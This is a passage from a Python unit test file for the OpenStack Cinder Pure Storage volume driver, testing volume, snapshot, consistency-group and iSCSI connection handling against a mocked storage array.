self.driver.create_volume_from_snapshot, VOLUME, SNAPSHOT)
SNAPSHOT["volume_size"] = 2 # reset size
@mock.patch(BASE_DRIVER_OBJ + "._add_volume_to_consistency_group",
autospec=True)
@mock.patch(BASE_DRIVER_OBJ + "._extend_if_needed", autospec=True)
@mock.patch(BASE_DRIVER_OBJ + "._get_pgroup_vol_snap_name",
spec=pure.PureBaseVolumeDriver._get_pgroup_vol_snap_name)
def test_create_volume_from_cgsnapshot(self, mock_get_snap_name,
mock_extend_if_needed,
mock_add_to_cgroup):
vol_name = VOLUME_WITH_CGROUP["name"] + "-cinder"
snap_name = "consisgroup-4a2f7e3a-312a-40c5-96a8-536b8a0f" \
"e074-cinder.4a2f7e3a-312a-40c5-96a8-536b8a0fe075."\
+ vol_name
mock_get_snap_name.return_value = snap_name
self.driver.create_volume_from_snapshot(VOLUME_WITH_CGROUP,
SNAPSHOT_WITH_CGROUP)
self.array.copy_volume.assert_called_with(snap_name, vol_name)
self.assertTrue(mock_get_snap_name.called)
self.assertTrue(mock_extend_if_needed.called)
self.driver.create_volume_from_snapshot(VOLUME_WITH_CGROUP,
SNAPSHOT_WITH_CGROUP)
mock_add_to_cgroup\
.assert_called_with(self.driver,
VOLUME_WITH_CGROUP['consistencygroup_id'],
vol_name)
def test_create_cloned_volume(self):
vol_name = VOLUME["name"] + "-cinder"
src_name = SRC_VOL["name"] + "-cinder"
# Branch where extend unneeded
self.driver.create_cloned_volume(VOLUME, SRC_VOL)
self.array.copy_volume.assert_called_with(src_name, vol_name)
self.assertFalse(self.array.extend_volume.called)
self.assert_error_propagates(
[self.array.copy_volume],
self.driver.create_cloned_volume, VOLUME, SRC_VOL)
self.assertFalse(self.array.extend_volume.called)
# Branch where extend needed
SRC_VOL["size"] = 1 # resize so smaller than VOLUME
self.driver.create_cloned_volume(VOLUME, SRC_VOL)
expected = [mock.call.copy_volume(src_name, vol_name),
mock.call.extend_volume(vol_name, 2 * units.Gi)]
self.array.assert_has_calls(expected)
self.assert_error_propagates(
[self.array.copy_volume, self.array.extend_volume],
self.driver.create_cloned_volume, VOLUME, SRC_VOL)
SRC_VOL["size"] = 2 # reset size
@mock.patch(BASE_DRIVER_OBJ + "._add_volume_to_consistency_group",
autospec=True)
def test_create_cloned_volume_with_cgroup(self, mock_add_to_cgroup):
vol_name = VOLUME_WITH_CGROUP["name"] + "-cinder"
self.driver.create_cloned_volume(VOLUME_WITH_CGROUP, SRC_VOL)
mock_add_to_cgroup\
.assert_called_with(self.driver,
VOLUME_WITH_CGROUP['consistencygroup_id'],
vol_name)
def test_delete_volume_already_deleted(self):
self.array.list_volume_private_connections.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Volume does not exist"
)
self.driver.delete_volume(VOLUME)
self.assertFalse(self.array.destroy_volume.called)
# Testing case where array.destroy_volume returns an exception
# because volume has already been deleted
self.array.list_volume_private_connections.side_effect = None
self.array.list_volume_private_connections.return_value = {}
self.array.destroy_volume.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Volume does not exist"
)
self.driver.delete_volume(VOLUME)
self.assertTrue(self.array.destroy_volume.called)
def test_delete_volume(self):
vol_name = VOLUME["name"] + "-cinder"
self.array.list_volume_private_connections.return_value = {}
self.driver.delete_volume(VOLUME)
expected = [mock.call.destroy_volume(vol_name)]
self.array.assert_has_calls(expected)
self.array.destroy_volume.side_effect = \
self.purestorage_module.PureHTTPError(code=400, text="reason")
self.driver.delete_snapshot(SNAPSHOT)
self.array.destroy_volume.side_effect = None
self.assert_error_propagates([self.array.destroy_volume],
self.driver.delete_volume, VOLUME)
def test_delete_connected_volume(self):
vol_name = VOLUME["name"] + "-cinder"
host_name_a = "ha"
host_name_b = "hb"
self.array.list_volume_private_connections.return_value = [{
"host": host_name_a,
"lun": 7,
"name": vol_name,
"size": 3221225472,
}, {
"host": host_name_b,
"lun": 2,
"name": vol_name,
"size": 3221225472,
}]
self.driver.delete_volume(VOLUME)
expected = [mock.call.list_volume_private_connections(vol_name),
mock.call.disconnect_host(host_name_a, vol_name),
mock.call.disconnect_host(host_name_b, vol_name),
mock.call.destroy_volume(vol_name)]
self.array.assert_has_calls(expected)
def test_create_snapshot(self):
vol_name = SRC_VOL["name"] + "-cinder"
self.driver.create_snapshot(SNAPSHOT)
self.array.create_snapshot.assert_called_with(
vol_name,
suffix=SNAPSHOT["name"]
)
self.assert_error_propagates([self.array.create_snapshot],
self.driver.create_snapshot, SNAPSHOT)
def test_delete_snapshot(self):
snap_name = SNAPSHOT["volume_name"] + "-cinder." + SNAPSHOT["name"]
self.driver.delete_snapshot(SNAPSHOT)
expected = [mock.call.destroy_volume(snap_name)]
self.array.assert_has_calls(expected)
self.array.destroy_volume.side_effect = \
self.purestorage_module.PureHTTPError(code=400, text="reason")
self.driver.delete_snapshot(SNAPSHOT)
self.array.destroy_volume.side_effect = None
self.assert_error_propagates([self.array.destroy_volume],
self.driver.delete_snapshot, SNAPSHOT)
@mock.patch(BASE_DRIVER_OBJ + "._get_host", autospec=True)
def test_terminate_connection(self, mock_host):
vol_name = VOLUME["name"] + "-cinder"
mock_host.return_value = {"name": "some-host"}
# Branch with manually created host
self.driver.terminate_connection(VOLUME, ISCSI_CONNECTOR)
self.array.disconnect_host.assert_called_with("some-host", vol_name)
self.assertFalse(self.array.list_host_connections.called)
self.assertFalse(self.array.delete_host.called)
# Branch with host added to host group
self.array.reset_mock()
self.array.list_host_connections.return_value = []
mock_host.return_value = PURE_HOST.copy()
mock_host.return_value.update(hgroup="some-group")
self.driver.terminate_connection(VOLUME, ISCSI_CONNECTOR)
self.array.disconnect_host.assert_called_with(PURE_HOST_NAME, vol_name)
self.assertTrue(self.array.list_host_connections.called)
self.assertTrue(self.array.delete_host.called)
# Branch with host still having connected volumes
self.array.reset_mock()
self.array.list_host_connections.return_value = [
{"lun": 2, "name": PURE_HOST_NAME, "vol": "some-vol"}]
mock_host.return_value = PURE_HOST
self.driver.terminate_connection(VOLUME, ISCSI_CONNECTOR)
self.array.disconnect_host.assert_called_with(PURE_HOST_NAME, vol_name)
self.array.list_host_connections.assert_called_with(PURE_HOST_NAME,
private=True)
self.assertFalse(self.array.delete_host.called)
# Branch where host gets deleted
self.array.reset_mock()
self.array.list_host_connections.return_value = []
self.driver.terminate_connection(VOLUME, ISCSI_CONNECTOR)
self.array.disconnect_host.assert_called_with(PURE_HOST_NAME, vol_name)
self.array.list_host_connections.assert_called_with(PURE_HOST_NAME,
private=True)
self.array.delete_host.assert_called_with(PURE_HOST_NAME)
# Branch where connection is missing and the host is still deleted
self.array.reset_mock()
self.array.disconnect_host.side_effect = \
self.purestorage_module.PureHTTPError(code=400, text="reason")
self.driver.terminate_connection(VOLUME, ISCSI_CONNECTOR)
self.array.disconnect_host.assert_called_with(PURE_HOST_NAME, vol_name)
self.array.list_host_connections.assert_called_with(PURE_HOST_NAME,
private=True)
self.array.delete_host.assert_called_with(PURE_HOST_NAME)
# Branch where an unexpected exception occurs
self.array.reset_mock()
self.array.disconnect_host.side_effect = \
self.purestorage_module.PureHTTPError(
code=500,
text="Some other error"
)
self.assertRaises(self.purestorage_module.PureHTTPError,
self.driver.terminate_connection,
VOLUME,
ISCSI_CONNECTOR)
self.array.disconnect_host.assert_called_with(PURE_HOST_NAME, vol_name)
self.assertFalse(self.array.list_host_connections.called)
self.assertFalse(self.array.delete_host.called)
@mock.patch(BASE_DRIVER_OBJ + "._get_host", autospec=True)
def test_terminate_connection_host_deleted(self, mock_host):
vol_name = VOLUME["name"] + "-cinder"
mock_host.return_value = PURE_HOST.copy()
self.array.reset_mock()
self.array.list_host_connections.return_value = []
self.array.delete_host.side_effect = \
self.purestorage_module.PureHTTPError(code=400,
text='Host does not exist.')
self.driver.terminate_connection(VOLUME, ISCSI_CONNECTOR)
self.array.disconnect_host.assert_called_with(PURE_HOST_NAME, vol_name)
self.array.list_host_connections.assert_called_with(PURE_HOST_NAME,
private=True)
self.array.delete_host.assert_called_once_with(PURE_HOST_NAME)
@mock.patch(BASE_DRIVER_OBJ + ".get_filter_function", autospec=True)
@mock.patch(BASE_DRIVER_OBJ + "._get_provisioned_space", autospec=True)
def test_get_volume_stats(self, mock_space, mock_filter):
filter_function = "capabilities.total_volumes < 10"
mock_space.return_value = (PROVISIONED_CAPACITY * units.Gi, 100)
mock_filter.return_value = filter_function
self.assertEqual({}, self.driver.get_volume_stats())
self.array.get.return_value = SPACE_INFO
result = {
"volume_backend_name": VOLUME_BACKEND_NAME,
"vendor_name": "Pure Storage",
"driver_version": self.driver.VERSION,
"storage_protocol": None,
"total_capacity_gb": TOTAL_CAPACITY,
"free_capacity_gb": TOTAL_CAPACITY - USED_SPACE,
"reserved_percentage": 0,
"consistencygroup_support": True,
"thin_provisioning_support": True,
"provisioned_capacity": PROVISIONED_CAPACITY,
"max_over_subscription_ratio": (PROVISIONED_CAPACITY /
USED_SPACE),
"total_volumes": 100,
"filter_function": filter_function,
}
real_result = self.driver.get_volume_stats(refresh=True)
self.assertDictMatch(result, real_result)
self.assertDictMatch(result, self.driver._stats)
@mock.patch(BASE_DRIVER_OBJ + ".get_filter_function", autospec=True)
@mock.patch(BASE_DRIVER_OBJ + "._get_provisioned_space", autospec=True)
def test_get_volume_stats_empty_array(self, mock_space, mock_filter):
filter_function = "capabilities.total_volumes < 10"
mock_space.return_value = (PROVISIONED_CAPACITY * units.Gi, 100)
mock_filter.return_value = filter_function
self.assertEqual({}, self.driver.get_volume_stats())
self.array.get.return_value = SPACE_INFO_EMPTY
result = {
"volume_backend_name": VOLUME_BACKEND_NAME,
"vendor_name": "Pure Storage",
"driver_version": self.driver.VERSION,
"storage_protocol": None,
"total_capacity_gb": TOTAL_CAPACITY,
"free_capacity_gb": TOTAL_CAPACITY,
"reserved_percentage": 0,
"consistencygroup_support": True,
"thin_provisioning_support": True,
"provisioned_capacity": PROVISIONED_CAPACITY,
"max_over_subscription_ratio": DEFAULT_OVER_SUBSCRIPTION,
"total_volumes": 100,
"filter_function": filter_function,
}
real_result = self.driver.get_volume_stats(refresh=True)
self.assertDictMatch(result, real_result)
self.assertDictMatch(result, self.driver._stats)
@mock.patch(BASE_DRIVER_OBJ + ".get_filter_function", autospec=True)
@mock.patch(BASE_DRIVER_OBJ + "._get_provisioned_space", autospec=True)
def test_get_volume_stats_nothing_provisioned(self, mock_space,
mock_filter):
filter_function = "capabilities.total_volumes < 10"
mock_space.return_value = (0, 0)
mock_filter.return_value = filter_function
self.assertEqual({}, self.driver.get_volume_stats())
self.array.get.return_value = SPACE_INFO
result = {
"volume_backend_name": VOLUME_BACKEND_NAME,
"vendor_name": "Pure Storage",
"driver_version": self.driver.VERSION,
"storage_protocol": None,
"total_capacity_gb": TOTAL_CAPACITY,
"free_capacity_gb": TOTAL_CAPACITY - USED_SPACE,
"reserved_percentage": 0,
"consistencygroup_support": True,
"thin_provisioning_support": True,
"provisioned_capacity": 0,
"max_over_subscription_ratio": DEFAULT_OVER_SUBSCRIPTION,
"total_volumes": 0,
"filter_function": filter_function,
}
real_result = self.driver.get_volume_stats(refresh=True)
self.assertDictMatch(result, real_result)
self.assertDictMatch(result, self.driver._stats)
def test_extend_volume(self):
vol_name = VOLUME["name"] + "-cinder"
self.driver.extend_volume(VOLUME, 3)
self.array.extend_volume.assert_called_with(vol_name, 3 * units.Gi)
self.assert_error_propagates([self.array.extend_volume],
self.driver.extend_volume, VOLUME, 3)
def test_get_pgroup_name_from_id(self):
id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe074"
expected_name = "consisgroup-%s-cinder" % id
actual_name = self.driver._get_pgroup_name_from_id(id)
self.assertEqual(expected_name, actual_name)
def test_get_pgroup_snap_suffix(self):
cgsnap = mock.Mock()
cgsnap.id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe074"
expected_suffix = "cgsnapshot-%s-cinder" % cgsnap.id
actual_suffix = self.driver._get_pgroup_snap_suffix(cgsnap)
self.assertEqual(expected_suffix, actual_suffix)
def test_get_pgroup_snap_name(self):
cg_id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe074"
cgsnap_id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe075"
mock_cgsnap = mock.Mock()
mock_cgsnap.consistencygroup_id = cg_id
mock_cgsnap.id = cgsnap_id
expected_name = "consisgroup-%(cg)s-cinder.cgsnapshot-%(snap)s-cinder"\
% {"cg": cg_id, "snap": cgsnap_id}
actual_name = self.driver._get_pgroup_snap_name(mock_cgsnap)
self.assertEqual(expected_name, actual_name)
def test_get_pgroup_vol_snap_name(self):
cg_id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe074"
cgsnap_id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe075"
volume_name = "volume-4a2f7e3a-312a-40c5-96a8-536b8a0fe075"
mock_snap = mock.Mock()
mock_snap.cgsnapshot = mock.Mock()
mock_snap.cgsnapshot.consistencygroup_id = cg_id
mock_snap.cgsnapshot.id = cgsnap_id
mock_snap.volume_name = volume_name
expected_name = "consisgroup-%(cg)s-cinder.cgsnapshot-%(snap)s-cinder"\
".%(vol)s-cinder" % {
"cg": cg_id,
"snap": cgsnap_id,
"vol": volume_name,
}
actual_name = self.driver._get_pgroup_vol_snap_name(mock_snap)
self.assertEqual(expected_name, actual_name)
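    # Taken together, the naming helpers above produce fully qualified
    # per-volume snapshot names of the form:
    #   consisgroup-<cg_id>-cinder.cgsnapshot-<cgsnap_id>-cinder.<volume_name>-cinder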
def test_create_consistencygroup(self):
mock_cgroup = mock.Mock()
mock_cgroup.id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe074"
model_update = self.driver.create_consistencygroup(None, mock_cgroup)
expected_name = self.driver._get_pgroup_name_from_id(mock_cgroup.id)
self.array.create_pgroup.assert_called_with(expected_name)
self.assertEqual({'status': 'available'}, model_update)
self.assert_error_propagates(
[self.array.create_pgroup],
self.driver.create_consistencygroup, None, mock_cgroup)
@mock.patch(BASE_DRIVER_OBJ + ".create_volume_from_snapshot")
@mock.patch(BASE_DRIVER_OBJ + ".create_consistencygroup")
def test_create_consistencygroup_from_src(self, mock_create_cg,
mock_create_vol):
mock_context = mock.Mock()
mock_group = mock.Mock()
mock_cgsnapshot = mock.Mock()
mock_snapshots = [mock.Mock() for i in range(5)]
mock_volumes = [mock.Mock() for i in range(5)]
self.driver.create_consistencygroup_from_src(
mock_context,
mock_group,
mock_volumes,
cgsnapshot=mock_cgsnapshot,
snapshots=mock_snapshots,
source_cg=None,
source_vols=None
)
mock_create_cg.assert_called_with(mock_context, mock_group)
expected_calls = [mock.call(vol, snap)
for vol, snap in zip(mock_volumes, mock_snapshots)]
mock_create_vol.assert_has_calls(expected_calls,
any_order=True)
self.assert_error_propagates(
[mock_create_vol, mock_create_cg],
self.driver.create_consistencygroup_from_src,
mock_context,
mock_group,
mock_volumes,
cgsnapshot=mock_cgsnapshot,
snapshots=mock_snapshots,
source_cg=None,
source_vols=None
)
def test_create_consistencygroup_from_src_no_snap(self):
# Expect an error when no cgsnapshot or snapshots are provided
self.assertRaises(exception.InvalidInput,
self.driver.create_consistencygroup_from_src,
mock.Mock(), # context
mock.Mock(), # group
[mock.Mock()]) # volumes
@mock.patch(BASE_DRIVER_OBJ + ".delete_volume", autospec=True)
def test_delete_consistencygroup(self, mock_delete_volume):
mock_cgroup = mock.MagicMock()
mock_cgroup.id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe074"
mock_cgroup['status'] = "deleted"
mock_context = mock.Mock()
self.driver.db = mock.Mock()
mock_volume = mock.MagicMock()
expected_volumes = [mock_volume]
self.driver.db.volume_get_all_by_group.return_value = expected_volumes
model_update, volumes = \
self.driver.delete_consistencygroup(mock_context, mock_cgroup)
expected_name = self.driver._get_pgroup_name_from_id(mock_cgroup.id)
self.array.destroy_pgroup.assert_called_with(expected_name)
self.assertEqual(expected_volumes, volumes)
self.assertEqual(mock_cgroup['status'], model_update['status'])
mock_delete_volume.assert_called_with(self.driver, mock_volume)
self.array.destroy_pgroup.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Protection group has been destroyed."
)
self.driver.delete_consistencygroup(mock_context, mock_cgroup)
self.array.destroy_pgroup.assert_called_with(expected_name)
mock_delete_volume.assert_called_with(self.driver, mock_volume)
self.array.destroy_pgroup.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Protection group does not exist"
)
self.driver.delete_consistencygroup(mock_context, mock_cgroup)
self.array.destroy_pgroup.assert_called_with(expected_name)
mock_delete_volume.assert_called_with(self.driver, mock_volume)
self.array.destroy_pgroup.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Some other error"
)
self.assertRaises(self.purestorage_module.PureHTTPError,
self.driver.delete_consistencygroup,
mock_context,
                          mock_cgroup)
self.array.destroy_pgroup.side_effect = \
self.purestorage_module.PureHTTPError(
code=500,
text="Another different error"
)
self.assertRaises(self.purestorage_module.PureHTTPError,
self.driver.delete_consistencygroup,
mock_context,
                          mock_cgroup)
self.array.destroy_pgroup.side_effect = None
self.assert_error_propagates(
[self.array.destroy_pgroup],
self.driver.delete_consistencygroup, mock_context, mock_cgroup)
def _create_mock_cg(self):
mock_group = mock.MagicMock()
mock_group.id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe074"
mock_group.status = "Available"
mock_group.cg_name = "consisgroup-" + mock_group.id + "-cinder"
return mock_group
def test_update_consistencygroup(self):
mock_group = self._create_mock_cg()
add_vols = [
{'name': 'vol1'},
{'name': 'vol2'},
{'name': 'vol3'},
]
expected_addvollist = [vol['name'] + '-cinder' for vol in add_vols]
remove_vols = [
{'name': 'vol4'},
{'name': 'vol5'},
]
expected_remvollist = [vol['name'] + '-cinder' for vol in remove_vols]
self.driver.update_consistencygroup(mock.Mock(), mock_group,
add_vols, remove_vols)
self.array.set_pgroup.assert_called_with(
mock_group.cg_name,
addvollist=expected_addvollist,
remvollist=expected_remvollist
)
def test_update_consistencygroup_no_add_vols(self):
mock_group = self._create_mock_cg()
expected_addvollist = []
remove_vols = [
{'name': 'vol4'},
{'name': 'vol5'},
]
expected_remvollist = [vol['name'] + '-cinder' for vol in remove_vols]
self.driver.update_consistencygroup(mock.Mock(), mock_group,
None, remove_vols)
self.array.set_pgroup.assert_called_with(
mock_group.cg_name,
addvollist=expected_addvollist,
remvollist=expected_remvollist
)
def test_update_consistencygroup_no_remove_vols(self):
mock_group = self._create_mock_cg()
add_vols = [
{'name': 'vol1'},
{'name': 'vol2'},
{'name': 'vol3'},
]
expected_addvollist = [vol['name'] + '-cinder' for vol in add_vols]
expected_remvollist = []
self.driver.update_consistencygroup(mock.Mock(), mock_group,
add_vols, None)
self.array.set_pgroup.assert_called_with(
mock_group.cg_name,
addvollist=expected_addvollist,
remvollist=expected_remvollist
)
def test_update_consistencygroup_no_vols(self):
mock_group = self._create_mock_cg()
self.driver.update_consistencygroup(mock.Mock(), mock_group,
None, None)
self.array.set_pgroup.assert_called_with(
mock_group.cg_name,
addvollist=[],
remvollist=[]
)
@mock.patch('cinder.objects.snapshot.SnapshotList.get_all_for_cgsnapshot')
def test_create_cgsnapshot(self, mock_snap_list):
mock_cgsnap = mock.Mock()
mock_cgsnap.id = "4a2f7e3a-312a-40c5-96a8-536b8a0fe074"
mock_cgsnap.consistencygroup_id = \
"4a2f7e3a-312a-40c5-96a8-536b8a0fe075"
mock_context = mock.Mock()
mock_snap = mock.MagicMock()
expected_snaps = [mock_snap]
mock_snap_list.return_value = expected_snaps
model_update, snapshots = \
self.driver.create_cgsnapshot(mock_context, mock_cgsnap)
cg_id = mock_cgsnap.consistencygroup_id
expected_pgroup_name = self.driver._get_pgroup_name_from_id(cg_id)
expected_snap_suffix = self.driver._get_pgroup_snap_suffix(mock_cgsnap)
self.array.create_pgroup_snapshot\
.assert_called_with(expected_pgroup_name,
suffix=expected_snap_suffix)
self.assertEqual({'status': 'available'}, model_update)
self.assertEqual(expected_snaps, snapshots)
self.assertEqual('available', mock_snap.status)
self.assert_error_propagates(
[self.array.create_pgroup_snapshot],
self.driver.create_cgsnapshot, mock_context, mock_cgsnap)
@mock.patch(BASE_DRIVER_OBJ + "._get_pgroup_snap_name",
spec=pure.PureBaseVolumeDriver._get_pgroup_snap_name)
@mock.patch('cinder.objects.snapshot.SnapshotList.get_all_for_cgsnapshot')
def test_delete_cgsnapshot(self, mock_snap_list, mock_get_snap_name):
snap_name = "consisgroup-4a2f7e3a-312a-40c5-96a8-536b8a0f" \
"e074-cinder.4a2f7e3a-312a-40c5-96a8-536b8a0fe075"
mock_get_snap_name.return_value = snap_name
mock_cgsnap = mock.Mock()
mock_cgsnap.status = 'deleted'
mock_context = mock.Mock()
mock_snap = mock.Mock()
expected_snaps = [mock_snap]
mock_snap_list.return_value = expected_snaps
model_update, snapshots = \
self.driver.delete_cgsnapshot(mock_context, mock_cgsnap)
self.array.destroy_pgroup.assert_called_with(snap_name)
self.assertEqual({'status': mock_cgsnap.status}, model_update)
self.assertEqual(expected_snaps, snapshots)
self.assertEqual('deleted', mock_snap.status)
self.array.destroy_pgroup.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Protection group snapshot has been destroyed."
)
self.driver.delete_cgsnapshot(mock_context, mock_cgsnap)
self.array.destroy_pgroup.assert_called_with(snap_name)
self.array.destroy_pgroup.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Protection group snapshot does not exist"
)
self.driver.delete_cgsnapshot(mock_context, mock_cgsnap)
self.array.destroy_pgroup.assert_called_with(snap_name)
self.array.destroy_pgroup.side_effect = \
self.purestorage_module.PureHTTPError(
code=400,
text="Some other error"
)
self.assertRaises(self.purestorage_module.PureHTTPError,
self.driver.delete_cgsnapshot,
mock_context,
mock_cgsnap)
self.array.destroy_pgroup.side_effect = \
self.purestorage_module.PureHTTPError(
code=500,
text="Another different error"
)
self.assertRaises(self.purestorage_module.PureHTTPError,
self.driver.delete_cgsnapshot,
mock_context,
mock_cgsnap)
self.array.destroy_pgroup.side_effect = None
self.assert_error_propagates(
[self.array.destroy_pgroup],
self.driver.delete_cgsnapshot, mock_context, mock_cgsnap)
def test_manage_existing(self):
ref_name = 'vol1'
volume_ref = {'name': ref_name}
self.array.list_volume_private_connections.return_value = []
vol_name = VOLUME['name'] + '-cinder'
self.driver.manage_existing(VOLUME, volume_ref)
self.array.list_volume_private_connections.assert_called_with(ref_name)
self.array.rename_volume.assert_called_with(ref_name, vol_name)
def test_manage_existing_error_propagates(self):
self.array.list_volume_private_connections.return_value = []
self.assert_error_propagates(
[self.array.list_volume_private_connections,
self.array.rename_volume],
self.driver.manage_existing,
VOLUME, {'name': 'vol1'}
)
def test_manage_existing_bad_ref(self):
self.assertRaises(exception.ManageExistingInvalidReference,
self.driver.manage_existing,
VOLUME, {'bad_key': 'bad_value'})
self.assertRaises(exception.ManageExistingInvalidReference,
self.driver.manage_existing,
VOLUME, {'name': ''})
self.assertRaises(exception.ManageExistingInvalidReference,
self.driver.manage_existing,
VOLUME, {'name': None})
self.array.get_volume.side_effect = \
self.purestorage_module.PureHTTPError(
text="Volume does not exist.",
code=400
)
self.assertRaises(exception.ManageExistingInvalidReference,
self.driver.manage_existing,
VOLUME, {'name': 'non-existing-volume'})
def test_manage_existing_with_connected_hosts(self):
ref_name = 'vol1'
self.array.list_volume_private_connections.return_value = \
["host1", "host2"]
self.assertRaises(exception.ManageExistingInvalidReference,
self.driver.manage_existing,
VOLUME, {'name': ref_name})
self.array.list_volume_private_connections.assert_called_with(ref_name)
self.assertFalse(self.array.rename_volume.called)
def test_manage_existing_get_size(self):
ref_name = 'vol1'
volume_ref = {'name': ref_name}
expected_size = 5
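        # 5368709120 bytes == 5 * 1024**3, i.e. 5 GiB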
self.array.get_volume.return_value = {"size": 5368709120}
size = self.driver.manage_existing_get_size(VOLUME, volume_ref)
self.assertEqual(expected_size, size)
self.array.get_volume.assert_called_with(ref_name)
def test_manage_existing_get_size_error_propagates(self):
self.array.get_volume.return_value = mock.MagicMock()
self.assert_error_propagates([self.array.get_volume],
self.driver.manage_existing_get_size,
VOLUME, {'name': 'vol1'})
def test_manage_existing_get_size_bad_ref(self):
self.assertRaises(exception.ManageExistingInvalidReference,
self.driver.manage_existing_get_size,
VOLUME, {'bad_key': 'bad_value'})
self.assertRaises(exception.ManageExistingInvalidReference,
self.driver.manage_existing_get_size,
VOLUME, {'name': ''})
self.assertRaises(exception.ManageExistingInvalidReference,
self.driver.manage_existing_get_size,
VOLUME, {'name': None})
def test_unmanage(self):
vol_name = VOLUME['name'] + "-cinder"
unmanaged_vol_name = vol_name + "-unmanaged"
self.driver.unmanage(VOLUME)
self.array.rename_volume.assert_called_with(vol_name,
unmanaged_vol_name)
def test_unmanage_error_propagates(self):
self.assert_error_propagates([self.array.rename_volume],
self.driver.unmanage,
VOLUME)
def test_unmanage_with_deleted_volume(self):
vol_name = VOLUME['name'] + "-cinder"
unmanaged_vol_name = vol_name + "-unmanaged"
self.array.rename_volume.side_effect = \
self.purestorage_module.PureHTTPError(
text="Volume does not exist.",
code=400
)
self.driver.unmanage(VOLUME)
self.array.rename_volume.assert_called_with(vol_name,
unmanaged_vol_name)
def test_retype(self):
# Ensure that we return true no matter what the inputs are
retyped, update = self.driver.retype(None, None, None, None, None)
self.assertTrue(retyped)
self.assertIsNone(update)
class PureISCSIDriverTestCase(PureDriverTestCase):
def setUp(self):
super(PureISCSIDriverTestCase, self).setUp()
self.mock_config.use_chap_auth = False
self.driver = pure.PureISCSIDriver(configuration=self.mock_config)
self.driver._array = self.array
def test_do_setup(self):
self.purestorage_module.FlashArray.return_value = self.array
self.array.get_rest_version.return_value = \
self.driver.SUPPORTED_REST_API_VERSIONS[0]
self.driver.do_setup(None)
self.purestorage_module.FlashArray.assert_called_with(
TARGET,
api_token=API_TOKEN
)
self.assertEqual(self.array, self.driver._array)
self.assertEqual(
self.driver.SUPPORTED_REST_API_VERSIONS,
self.purestorage_module.FlashArray.supported_rest_versions
)
def test_get_host(self):
good_host = PURE_HOST.copy()
good_host.update(iqn=["another-wrong-iqn", INITIATOR_IQN])
bad_host = {"name": "bad-host", "iqn": ["wrong-iqn"]}
self.array.list_hosts.return_value = [bad_host]
real_result = self.driver._get_host(ISCSI_CONNECTOR)
self.assertIs(None, real_result)
self.array.list_hosts.return_value.append(good_host)
real_result = self.driver._get_host(ISCSI_CONNECTOR)
self.assertEqual(good_host, real_result)
self.assert_error_propagates([self.array.list_hosts],
self.driver._get_host, ISCSI_CONNECTOR)
@mock.patch(ISCSI_DRIVER_OBJ + "._connect")
@mock.patch(ISCSI_DRIVER_OBJ + "._get_target_iscsi_ports")
def test_initialize_connection(self, mock_get_iscsi_ports,
mock_connection):
mock_get_iscsi_ports.return_value = ISCSI_PORTS
lun = 1
connection = {
"vol": VOLUME["name"] + "-cinder",
"lun": lun,
}
mock_connection.return_value = connection
result = deepcopy(ISCSI_CONNECTION_INFO)
real_result = self.driver.initialize_connection(VOLUME,
ISCSI_CONNECTOR)
self.assertDictMatch(result, real_result)
mock_get_iscsi_ports.assert_called_with()
mock_connection.assert_called_with(VOLUME, ISCSI_CONNECTOR, None)
self.assert_error_propagates([mock_get_iscsi_ports, mock_connection],
self.driver.initialize_connection,
VOLUME, ISCSI_CONNECTOR)
@mock.patch(ISCSI_DRIVER_OBJ + "._connect")
@mock.patch(ISCSI_DRIVER_OBJ + "._get_target_iscsi_ports")
def test_initialize_connection_with_auth(self, mock_get_iscsi_ports,
mock_connection):
auth_type = "CHAP"
chap_username = ISCSI_CONNECTOR["host"]
chap_password = "password"
mock_get_iscsi_ports.return_value = ISCSI_PORTS
initiator_update = [{"key": pure.CHAP_SECRET_KEY,
"value": chap_password}]
mock_connection.return_value = {
"vol": VOLUME["name"] + "-cinder",
"lun": 1,
"auth_username": chap_username,
"auth_password": chap_password,
}
result = deepcopy(ISCSI_CONNECTION_INFO)
result["data"]["auth_method"] = auth_type
result["data"]["auth_username"] = chap_username
result["data"]["auth_password"] = chap_password
self.mock_config.use_chap_auth = True
# Branch where no credentials were generated
real_result = self.driver.initialize_connection(VOLUME,
ISCSI_CONNECTOR)
mock_connection.assert_called_with(VOLUME, ISCSI_CONNECTOR, None)
self.assertDictMatch(result, real_result)
# Branch where new credentials were generated
mock_connection.return_value["initiator_update"] = initiator_update
result["initiator_update"] = initiator_update
real_result = self.driver.initialize_connection(VOLUME,
ISCSI_CONNECTOR)
mock_connection.assert_called_with(VOLUME, ISCSI_CONNECTOR, None)
self.assertDictMatch(result, real_result)
self.assert_error_propagates([mock_get_iscsi_ports, mock_connection],
self.driver.initialize_connection,
VOLUME, ISCSI_CONNECTOR)
@mock.patch(ISCSI_DRIVER_OBJ + "._connect")
@mock.patch(ISCSI_DRIVER_OBJ + "._get_target_iscsi_ports")
def test_initialize_connection_multipath(self,
mock_get_iscsi_ports,
mock_connection):
mock_get_iscsi_ports.return_value = ISCSI_PORTS
lun = 1
connection = {
"vol": VOLUME["name"] + "-cinder",
"lun": lun,
}
mock_connection.return_value = connection
multipath_connector = deepcopy(ISCSI_CONNECTOR)
multipath_connector["multipath"] = True
result = deepcopy(ISCSI_CONNECTION_INFO)
real_result = self.driver.initialize_connection(VOLUME,
multipath_connector)
self.assertDictMatch(result, real_result)
mock_get_iscsi_ports.assert_called_with()
mock_connection.assert_called_with(VOLUME, multipath_connector, None)
multipath_connector["multipath"] = False
self.driver.initialize_connection(VOLUME, multipath_connector)
def test_get_target_iscsi_ports(self):
self.array.list_ports.return_value = ISCSI_PORTS
ret = self.driver._get_target_iscsi_ports()
self.assertEqual(ISCSI_PORTS, ret)
def test_get_target_iscsi_ports_with_iscsi_and_fc(self):
self.array.list_ports.return_value = PORTS_WITH
ret = self.driver._get_target_iscsi_ports()
